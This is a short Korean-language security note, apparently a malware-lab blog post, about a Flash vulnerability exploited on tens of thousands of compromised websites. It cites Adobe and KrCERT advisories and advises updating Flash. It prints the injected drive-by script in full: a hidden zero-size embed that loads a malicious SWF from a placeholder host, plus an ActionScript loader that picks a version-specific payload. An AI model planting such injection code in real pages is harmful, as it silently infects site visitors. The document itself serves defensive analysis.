http://viruslab.tistory.com/175 추가 분석 자료
1231.swf -> 4561.swf
1232.swf -> 4562.swf
http://www.adobe.com/support/security/bulletins/apsb08-11.html
http://www.krcert.or.kr/secureNoticeView.do?num=258&seq=-1
현재 조회결과 5만 3천여개의 국내외 사이트가 피해를 입고 있다. (SWF 취약점 외 다수 사용)
이 수치는 시간에 따라 증감할 수 있다.
한국과 중국에서 유포되는 형태가 유사한 것으로 보아서는 제작도구를 이용한 것으로 보인다.
공격 스크립트 코드 형태는 아래와 같다.
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.????.com/flash/malware.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.????.com/flash/malware.swf” mce_src=”http://www.????.com/flash/malware.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.????.com/flash/malware.swf width=0 height=0>”);}}
액션 스크립트를 이용한다.
var flashVersion =/hxversion;
loadMovie(”http://www.????.com/flash/” + flashVersion + “malware.swf”, _root);
stop();
최신 버전 사용하기
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
